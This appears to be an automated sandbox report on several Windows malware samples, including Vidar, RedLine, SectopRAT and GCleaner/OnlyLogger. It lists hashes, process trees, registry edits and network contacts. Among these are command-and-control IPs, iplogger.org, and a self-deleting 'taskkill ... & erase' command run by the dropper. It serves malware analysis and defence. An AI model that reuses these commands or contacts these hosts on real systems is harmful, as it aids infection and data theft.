| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
memory/2868-82-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
memory/2868-98-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/2868-104-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-105-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-106-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-107-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-108-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-109-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-110-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-111-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-112-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-113-0x0000000000400000-0x00000000021A3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
141s
Command Line
Signatures
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Litever01.exe
"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1040
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eduarroma.tumblr.com | udp |
| US | 74.114.154.18:443 | eduarroma.tumblr.com | tcp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
Files
memory/2440-2-0x0000000003A80000-0x0000000003B1D000-memory.dmp
memory/2440-1-0x0000000001FE0000-0x00000000020E0000-memory.dmp
memory/2440-3-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/2440-15-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/2440-14-0x0000000003A80000-0x0000000003B1D000-memory.dmp
memory/2440-13-0x0000000000400000-0x0000000001DCA000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
131s
Max time network
143s
Command Line
Signatures
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\mixseven.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\mixseven.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\mixseven.exe
"C:\Users\Admin\AppData\Local\Temp\mixseven.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 816
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1096
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1520
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{1kiV-Oo1OR-715W-7AXLp}\59179149410.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{1kiV-Oo1OR-715W-7AXLp}\83672750208.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{1kiV-Oo1OR-715W-7AXLp}\03117619787.exe" /mix
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1844
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixseven.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mixseven.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2084 -ip 2084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1996
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixseven.exe" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | garbage-cleaner.biz | udp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 8.8.8.8:53 | 161.227.145.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:80 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
Files
memory/2084-1-0x0000000001DC0000-0x0000000001EC0000-memory.dmp
memory/2084-2-0x0000000003AF0000-0x0000000003B20000-memory.dmp
memory/2084-3-0x0000000000400000-0x0000000000432000-memory.dmp
memory/2084-4-0x0000000000400000-0x0000000001D82000-memory.dmp
memory/2084-5-0x0000000001DC0000-0x0000000001EC0000-memory.dmp
memory/2084-6-0x0000000003AF0000-0x0000000003B20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{1kiV-Oo1OR-715W-7AXLp}\59179149410.exe
| MD5 | 6445250d234e789c0c2afe69f119e326 |
| SHA1 | 03074f75c0ff50783d8c2e32d96e39b746540f66 |
| SHA256 | 2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f |
| SHA512 | ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e |
memory/2084-31-0x0000000000400000-0x0000000000432000-memory.dmp
memory/2084-30-0x0000000000400000-0x0000000001D82000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20240729-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\udptest.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\udptest.exe
"C:\Users\Admin\AppData\Local\Temp\udptest.exe"
Network
| Country | Destination | Domain | Proto |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp |
Files
memory/2296-2-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2296-1-0x0000000001E20000-0x0000000001F20000-memory.dmp
memory/2296-3-0x0000000003720000-0x0000000003744000-memory.dmp
memory/2296-4-0x0000000000400000-0x0000000001D88000-memory.dmp
memory/2296-6-0x0000000003740000-0x0000000003762000-memory.dmp
memory/2296-5-0x0000000000400000-0x0000000001D88000-memory.dmp
memory/2296-7-0x0000000001E20000-0x0000000001F20000-memory.dmp
memory/2296-9-0x0000000000400000-0x0000000000433000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20240903-en
Max time kernel
131s
Max time network
142s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1960 set thread context of 2056 | N/A | C:\Users\Admin\AppData\Local\Temp\NAN.exe | C:\Users\Admin\AppData\Local\Temp\NAN.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\NAN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\NAN.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NAN.exe
"C:\Users\Admin\AppData\Local\Temp\NAN.exe"
C:\Users\Admin\AppData\Local\Temp\NAN.exe
C:\Users\Admin\AppData\Local\Temp\NAN.exe
Network
| Country | Destination | Domain | Proto |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp |
Files
memory/1960-0-0x0000000074D6E000-0x0000000074D6F000-memory.dmp
memory/1960-1-0x0000000000F30000-0x0000000000FCE000-memory.dmp
memory/1960-2-0x0000000074D60000-0x000000007544E000-memory.dmp
memory/2056-3-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2056-9-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2056-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2056-6-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2056-5-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2056-4-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2056-13-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2056-11-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2056-15-0x0000000074D60000-0x000000007544E000-memory.dmp
memory/1960-14-0x0000000074D60000-0x000000007544E000-memory.dmp
memory/2056-16-0x0000000074D60000-0x000000007544E000-memory.dmp
memory/2056-17-0x0000000074D60000-0x000000007544E000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20240729-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\anyname.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\anyname.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:12
Platform
win7-20240903-en
Max time kernel
209s
Max time network
196s
Command Line
Signatures
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_32-2 = "V2.0|Action=Block|Dir=Out|App=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe|Svc=clr_optimization_v4.0.30319_32|Name=Block traffic for clr_optimization_v4.0.30319_32|" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_64-1 = "V2.0|Action=Block|Dir=In|App=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe|Svc=clr_optimization_v4.0.30319_64|Name=Block traffic for clr_optimization_v4.0.30319_64|" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_64-2 = "V2.0|Action=Block|Dir=Out|App=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe|Svc=clr_optimization_v4.0.30319_64|Name=Block traffic for clr_optimization_v4.0.30319_64|" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_32-1 = "V2.0|Action=Block|Dir=In|App=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe|Svc=clr_optimization_v4.0.30319_32|Name=Block traffic for clr_optimization_v4.0.30319_32|" | C:\Windows\system32\msiexec.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\ = ".NET Framework" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\ComponentID = ".NETFramework" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\ = ".NET Framework" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\Version = "4,0,30319,0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\Locale | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\ComponentID = ".NETFramework" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\Locale | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\Version = "4,0,30319,0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9} | C:\Windows\system32\msiexec.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "SoftpubCheckCert" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "CORPolicyEE" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$Function = "SoftpubLoadMessage" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsecimpl.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}\$DLL = "WINTRUST.DLL" | C:\Windows\system32\msiexec.exe | N/A |
